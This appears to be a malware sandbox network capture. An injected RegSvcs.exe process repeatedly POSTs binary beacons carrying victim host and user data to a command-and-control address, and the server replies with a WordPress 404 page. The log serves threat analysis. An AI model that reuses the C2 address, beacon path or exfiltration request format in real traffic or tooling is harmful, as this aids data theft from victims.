                                            May 29, 2024 15:43:33.221077919 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:33.221088886 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:33.221101046 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:33.221112967 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:33.221251011 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:33.221262932 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:33.221272945 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:33.221434116 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:33.221486092 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.94974745.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:33.478549957 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:33.486953020 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:35.962335110 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:34 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:35.962393999 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:35.962434053 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:35.962452888 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:35.962486029 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:35.962505102 CEST1236INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:35.962521076 CEST1236INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31
                                            Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                                            May 29, 2024 15:43:35.962538958 CEST1120INData Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                                            Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
                                            May 29, 2024 15:43:35.962558985 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:35.962599039 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.94974845.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:36.155571938 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:36.160568953 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:38.566493034 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:36 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:38.566529989 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:38.566546917 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:38.566564083 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:38.566579103 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:38.566595078 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:38.567006111 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:38.567048073 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:43:38.567063093 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:43:38.567078114 CEST1236INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.94974945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:38.811866999 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:38.816879988 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:41.307538986 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:39 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
